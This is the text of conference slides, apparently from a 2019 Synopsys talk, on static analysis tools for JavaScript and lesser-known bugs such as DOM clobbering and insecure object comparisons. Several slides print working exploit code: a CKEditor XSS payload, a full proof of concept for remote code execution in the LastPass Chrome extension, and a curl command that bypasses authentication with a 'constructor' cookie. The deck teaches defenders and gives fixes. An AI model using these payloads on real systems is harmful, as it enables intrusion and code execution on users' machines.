  • 14. © 2019 Synopsys, Inc.14 Products that perform JavaScript dataflow analysis: • Coverity Scan • LGTM Tools that look for areas of interest: • Tarnish • JSHint • JSLint • ESLint – Code Climate—nodesecurity plugin • TSLint – tslint-angular-security Tools that look for known issues in JavaScript libraries: • Retire.js • npm audit • yarn audit • GitHub • Snyk • auditjs Tools that deobfuscate JavaScript: • Closure Compiler • JStillery • unminify JavaScript analysis tools Referencing only projects that either are open source or scan open source
  • 15. © 2019 Synopsys, Inc.15 React https://chrome.google.com/webstore/detail/react-developer- tools/fmkadmapgofadopljbjfkapdkoienihi?hl=en AngularJS https://chrome.google.com/webstore/detail/angularjs- batarang/ighdmehidhipcmcojjgiloacoafjmpfk?hl=en Angular https://augury.rangle.io/ Vue https://github.com/vuejs/vue-devtools Framework analysis browser extensions Just because “production mode is set” doesn’t mean they can’t be used for live apps https://lh3.googleusercontent.com/GjX6Q3_FVJfc0DqE2wiPKkgOfth6otzV-D7GV- wB6sH5_t1oodMaHOBLsYOLeydb85bKWu6X=w640-h400-e365
  • 16. © 2019 Synopsys, Inc.16 Known issues in JavaScript libraries Always check for known security issues • GitHub automatically reports security issues • Depending on project type, use tools: Example Command npm npm audit yarn yarn audit bower auditjs --bower bower.json Client-side JavaScript retire --js /path/ Node.js open source snyk test
  • 17. © 2019 Synopsys, Inc.17 ESLint • ESLint is an open source pluggable linting utility for JavaScript • Linters parse ASTs to identify code quality and security issues • ESLint was created to allow developers to enforce rules • Can be hooked into the development release cycle – Many developers do not allow code to be pushed with ESLint issues flagged – You can create Git hooks – Can be part of CI/CD pipeline • Allows custom rules to enforce domain specific guidance
  • 18. © 2019 Synopsys, Inc.18 ESLint ESLint is now the go-to tool for JavaScript developers https://stateofjs.com/2017/other-tools/
  • 19. © 2019 Synopsys, Inc.19 ESLint security rules ESLint can help security consultants look for points of interest Default security rule configs • Node.js https://github.com/nodesecurity/eslint-config-nodesecurity • Vanilla JS https://github.com/mozfreddyb/eslint-config-scanjs • AngularJS https://github.com/LewisArdern/eslint-plugin-angularjs-security-rules • React https://github.com/yannickcr/eslint-plugin-react#list-of-supported-rules Security rules • eslint-plugin-scanjs • eslint-plugin-security • eslint-plugin-react • eslint-plugin-angularjs-security • eslint-plugin-no-wildcard-postmessage • eslint-plugin-no-unsafe-innerhtml • vue/no-v-html • eslint-plugin-prototype-pollution-security-rules
  • 20. © 2019 Synopsys, Inc.20 Problem: In AngularJS security assessments, I want to identify problem locations quickly Solution: Create ESLint rules to run on every assessment as a starting point: JavaScript analysis tools for AngularJS https://www.npmjs.com/package/eslint-plugin-angularjs-security-rules
  • 21. © 2019 Synopsys, Inc.21 Steps to create a rule 1. Create a test with true positive and false positive 2. Walk the JavaScript AST and identify your requirements 3. Create a rule from the AST output 4. Make sure the test passes
  • 22. © 2019 Synopsys, Inc.22 Creating a test
  • 23. © 2019 Synopsys, Inc.23 Identifying the requirements
  • 24. © 2019 Synopsys, Inc.24 Create the rule
  • 25. © 2019 Synopsys, Inc.25 Testing the rules https://blog.appsecco.com/static-analysis-of-client-side-javascript-for-pen-testers-and-bug-bounty-hunters-f1cb1a5d5288 https://github.com/bkimminich/juice-shop
  • 26. © 2019 Synopsys, Inc.26 Lesser-known security issues Let’s talk about lesser-known bugs!
  • 27. © 2019 Synopsys, Inc.27 DOM clobbering Due to DOM specifications, certain HTML attributes have the ability to create values in JavaScript http://jibbering.com/faq/names http://thespanner.co.uk/2013/05/16/dom-clobbering Attributes can be used to define JavaScript values • id • action • form – input – name This can lead to: • Cross-site scripting (XSS) • Remote code execution (RCE) in browser extensions
  • 28. © 2019 Synopsys, Inc.28 DOM clobbering <html> <head> </head> <body> <test id=“value" foooo=“value" action=“exists"><form> <div id=“valueExists" name=“exists"><form> <script> if (value.action !== undefined) { alert('Dom Clobbering’) } if (value.foooo !== undefined) { // Value does not exist } if (valueExists !== undefined) { alert('DOM Clobbering’) } if (valueExists.exists !== undefined) { // Value does not exist } </script> </body> </html>
  • 29. © 2019 Synopsys, Inc.29 DOM clobbering <html> <body> <form><input name="ownerDocument"></form> <script> console.log(document.forms[0].ownerDocument) // Should return window.document // Returns <input name="ownerDocument"> </script> </body> </html>
  • 30. © 2019 Synopsys, Inc.30 DOM clobbering // Exploit Code From Mario’ talk https://www.slideshare.net/x00mario/in-the-dom-no-one-will-hear-you-scream#34 // Exploit <a href="plugins/preview/preview.html#<svg onload=alert(1)>" id="_cke_htmlToLoad" target="_blank">Click me for dolphins!</a> // Vulnerable Code <script> var doc = document; doc.open(); doc.write(window.opener._cke_htmlToLoad); doc.close; delete window.opener._cke_htmlToLoad </script> Exploit that achieved cross-site scripting in CKEditor https://www.slideshare.net/x00mario/in-the-dom-no-one-will-hear-you-scream#34
  • 31. © 2019 Synopsys, Inc.31 Demo DOM clobbering
  • 32. © 2019 Synopsys, Inc.32 DOM clobbering function lp_url_is_lastpass(e) { if (null == e) return !1; var t = /^https://([a-z0-9-]+.)?lastpass.(eu|com)//i , n = "https://lastpass.com/"; if ("undefined" != typeof base_url && (n = base_url), 0 == e.indexOf(n) || 0 == e.indexOf("https://lastpass.com/") || 0 == e.indexOf("https://lastpass.eu/")) return !0; if ("undefined" != typeof g_loosebasematching) { var i = lp_gettld_url(e); return new RegExp(i + "/$").test(base_url) } return t.test(e) } ... "openattach" == t.eventtype.value ? sendBG({ cmd: "openattach", attachkey: t.eventdata1.value, data: t.eventdata2.value, mimetype: t.eventdata3.value ... Exploit that achieved remote code execution in LastPass Chrome extension https://bugs.chromium.org/p/project-zero/issues/detail?id=1225&desc=6 Can be set with: x = document.createElement("a"); x.setAttribute("id", "base_url"); Can be set defined with <value id="g_loosebasematching" /> Used to send Remote Procedure Calls (RPC) leading to RCE
  • 33. © 2019 Synopsys, Inc.33 DOM clobbering <html> <head> <script> function start() { x = document.createElement("a"); x.setAttribute("id", "base_url"); x.setAttribute("href", "//" + document.location.hostname); document.body.appendChild(x); exploit.submit(); } </script> </head> <body onload="start()"> <exploit id="g_loosebasematching" /> <form id="exploit" name="lpwebsiteeventform"> <input type="hidden" name="eventtype" value="openattach"> <input type="hidden" name="eventdata1" value="d44479a4ce97554c24399f651ca76899179dec81c854b38ef2389c3185ae8eec"> <input type="hidden" name="eventdata2" value="!8uK7g5j8Eq08Nr86mhmMxw==|1dSN0jXZSQ51V1ww9rk4DQ=="> <input type="hidden" name="eventdata3" value="other:./../../../../../Desktop/exploit.bat"> <form> </body> </html> Exploit that achieved remote code execution in LastPass Chrome extension https://bugs.chromium.org/p/project-zero/issues/detail?id=1225&desc=6
  • 34. © 2019 Synopsys, Inc.34 DOM clobbering https://bugs.chromium.org/p/project-zero/issues/attachment?aid=277766&signed_aid=cHmKiER3b1GkZKd_e_0PAA==&inline=1
  • 35. © 2019 Synopsys, Inc.35 Insecure object comparisons Similar to DOM clobbering, there are many other ways insecure comparisons can happen const SESSIONS = {} const mustBeAuthenticated = (req, res, next) => { if(req.cookies) { const token = req.cookies.token if(token && SESSIONS[token]) { //allow it next() } } res.send('not authorized!') }
  • 36. © 2019 Synopsys, Inc.36 Comparison table Value Return SESSIONS['invalidString'] False SESSIONS[''] False SESSIONS['constructor'] True SESSIONS['hasOwnPropery'] True
  • 37. © 2019 Synopsys, Inc.37 What happens when you create an object in JavaScript? const test = {} __proto__: constructor: ƒ Object() hasOwnProperty: ƒ hasOwnProperty() isPrototypeOf: ƒ isProrotypeOf() [...] test['constructor'] === test.constructor //returns true
  • 38. © 2019 Synopsys, Inc.38 Exploit • This issue is trivial to exploit • Using curl, we can simply run the following command: – curl https://localhost:9000 -H "Cookie: token=constructor" • Alternatively, we can just set the document.cookie value via the browser
  • 39. © 2019 Synopsys, Inc.39 Demo Insecure object comparisons
  • 40. © 2019 Synopsys, Inc.40 SESSIONS.has('__proto__'); // false SESSIONS.has('validString'); // true How do we correctly check? Or you can use a Map instead of an Object SESSIONS.hasOwnProperty['__proto__'] // false SESSIONS.hasOwnProperty['validString'] // true
  • 41. © 2019 Synopsys, Inc.41 Note on authentication • Use a well-tested library like Passport to do authentication –http://www.passportjs.org/ • If rolling your own, use crypto.timingSafeEqual(a, b) –It provides a safe comparison –Also prevents timing attacks!
  • 42. © 2019 Synopsys, Inc.42 Other issues Prototype pollution • https://www.youtube.com/watch?v=LUsiFV3dsK8 • https://github.com/HoLyVieR/prototype-pollution-nsec18 • https://www.slideshare.net/LewisArdern/dangerous-design-patterns-in-one-line • https://github.com/LewisArdern/eslint-plugin-prototype-pollution-security-rules • https://gist.github.com/LewisArdern/db02e6c37b69c7cb4f1059dc9e536923 Mass assignment • https://talks.amanvir.io/forward-js-san-francisco-security-issues-in-modern-javascript-Jan- 2019.pdf • https://www.owasp.org/index.php/Mass_Assignment_Cheat_Sheet • https://www.npmjs.com/package/mongoose-mass-assign
  • 43. © 2019 Synopsys, Inc.43 Summary • Adopt and embrace developer tools to identify security issues • Conduct regular code reviews • Measure and track your code quality and security • Automate the process: – ESLint for code linting and npm audit for dependencies – Various static analysis tools for quality and security – Break your CI build if any issues get flagged
  • 44. Thank You Questions? Email: lewis@ardern.io Website: https://ardern.io Twitter: https://twitter.com/LewisArdern GitHub: https://github.com/LewisArdern LinkedIn: https://www.linkedin.com/in/lewis-ardern-83373a40